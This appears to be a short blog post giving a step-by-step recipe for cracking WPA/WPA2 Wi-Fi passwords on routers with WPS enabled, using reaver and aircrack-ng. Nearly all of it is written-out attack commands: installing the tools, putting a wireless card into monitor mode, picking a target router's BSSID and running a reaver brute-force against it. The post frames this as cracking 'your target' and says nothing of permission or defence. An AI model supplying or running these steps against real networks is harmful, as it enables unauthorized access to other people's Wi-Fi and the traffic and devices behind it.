This method only work against WPA/WPA2 on WiFI with WPS enabled.
1. Install reaver,
apt-get install reaver
2. Install aircrack-ng
apt-get install aircrack-ng
3. Put your wireless card into monitoring mode,
airmon-ng start wlan0
4. Find BSSID of the router you wanna crack. Suppose to be it's WPA/WPA2 encryption.
5. Crack your target using reaver app,
reaver -i monitorinterface -b yourtargetbbsid -vv
ex,
reaver -i mon0 -b 00:11:22:33:44:55 -vv
6. just wait until reaver finish the job and suppose to be you will get your target WPA/WPA2 key.
Remember, method only work on WiFI with WPS enabled!
No comments:
Post a Comment